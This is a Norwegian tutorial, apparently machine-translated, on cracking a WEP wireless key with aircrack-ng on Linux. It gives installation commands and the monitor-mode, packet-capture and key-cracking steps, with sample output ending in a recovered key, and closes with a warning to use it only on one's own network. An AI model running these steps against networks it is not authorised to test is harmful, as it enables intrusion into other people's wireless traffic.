denne artikkelen kort beskriver enkle trinn på hvordan å knekke en trådløs wep-nøkkel ved hjelp av aircrack-ng programvare. Dette kan gjøres ved å snuse et trådløst nettverk, fange krypterte pakker og kjøre passende krypteringssprekkingsprogram i et forsøk på å dekryptere fangede data. WEP (Wired Equivalent Privacy) er ganske enkelt å knekke, da det bare bruker en nøkkel til å kryptere all trafikk.
grunnprinsippet er at kommunikasjon mellom to noder på nettverket er BASERT PÅ MAC-adressen. Hver vert mottar pakker bare ment FOR MAC-adressen til sitt eget grensesnitt. Det samme prinsippet gjelder også for trådløse nettverk. Men hvis en node setter sitt eget nettverkskort i promiskuøs modus, vil den også motta pakker som ikke er adressert for SIN EGEN MAC-adresse.
for å knekke wep-nøkkelen, må en hacker fange prøvepakker som ikke er ment for sitt eget nettverksgrensesnitt og kjøre crack-program for å sammenligne testnøkler mot WEP-nøkkel buntet med fangede pakker i forsøk på dekryptering. Nøkkelen som passer for å dekryptere fangede pakker, er nøkkelen som brukes av trådløst nettverk for å kryptere hele den trådløse kommunikasjonen med de tilkoblede stasjonene.
i de følgende avsnittene veileder vi deg gjennom aircrack-ng-installasjonen På Linux, og viser deg trinnvise instruksjoner for å knekke en trådløs wep-nøkkel. Guiden forutsetter at du har trådløst nettverkskort installert og at den støtter skjermmodus.
i denne opplæringen vil du lære:
- slik installerer aircrack-ng på store Linux distros
- hvordan knekke en trådløs wep-nøkkel ved hjelp aircrack-ng
Kategori | Krav, Konvensjoner Eller Programvareversjon Som Brukes |
---|---|
System | Noen Linux distro |
Programvare | aircrack-ng |
Annet | Privilegert tilgang Til Linux-systemet ditt som rot eller via kommandoen sudo . |
Konvensjoner | # – krever at gitte linux-kommandoer kjøres med rotrettigheter enten direkte som rotbruker eller ved bruk av kommandoen sudo $ – krever at gitte linux-kommandoer kjøres som en vanlig ikke-privilegert bruker |
Installer aircrack – ng på store Linux distros
for å komme i gang trenger du aircrack-ng-programvaren installert på systemet ditt. Du kan bruke den riktige kommandoen nedenfor for å installere programmet med systemets pakkebehandling.
for å installere aircrack-ng På Ubuntu, Debian og Linux Mint:
$ sudo apt install aircrack-ng
for å installere aircrack-ng På CentOS, Fedora, AlmaLinux og Red Hat:
$ sudo dnf install aircrack-ng
slik installerer aircrack-ng På Arch Linux Og Manjaro:
$ sudo pacman -S aircrack-ng
Sprekk trådløs wep nøkkel
- først må vi identifisere navnet på vårt trådløse nettverksgrensesnitt. Hvis det trådløse nettverkskortet er riktig installert, vil en kommando
iwconfig
vise navnet på det trådløse nettverksgrensesnittet:$ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
utgangen viser at i vårt tilfelle er grensesnittnavnet
wlan0
. - slå deretter på skjermmodus for det trådløse grensesnittet.
# airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)
resultatet av kommandoen vil gi deg navnet på det nye virtuelle grensesnittet. Det pleier å være
mon0
. - Dump resultatene av skjermen til en terminal, slik at du kan se dem.
# airodump-ng mon0
Du kan se en tabell med data knyttet til trådløse nettverk i ditt område. Du trenger bare informasjon om nettverket du ønsker å knekke. Se etter DET, og merk BSSID og kanalen som den er på.
- deretter skal du logge resultatene av en skanning til en fil. Den fangstloggen vil Være nødvendig av Aircrack for å kjøre et brute force-angrep på nettverket senere. For å få fangst, skal du kjøre samme kommando som før, men du angir BSSID, kanal og loggplassering.
# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
Fyll ut din faktiske informasjon før du kjører kommandoen, og la den kjøre.
- som et siste skritt vi knekke wep-tasten ved hjelp av fanget pakker og aircrack-ng kommando. Alle fanget pakker er nå lagret i
wep-crack-01.cap
fil.# aircrack-ng -z wep-crack-01.cap
utgangen din skal se slik ut:
Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
Lukke Tanker
i denne veiledningen så vi hvordan du installerer aircrack-ng På Linux og bruker programvaren til å knekke en trådløs wep-nøkkel. Husk at denne prosessen bare skal brukes til å teste din egen sikkerhet eller for utdanningsformål. Å bruke det på andres nettverk er ulovlig.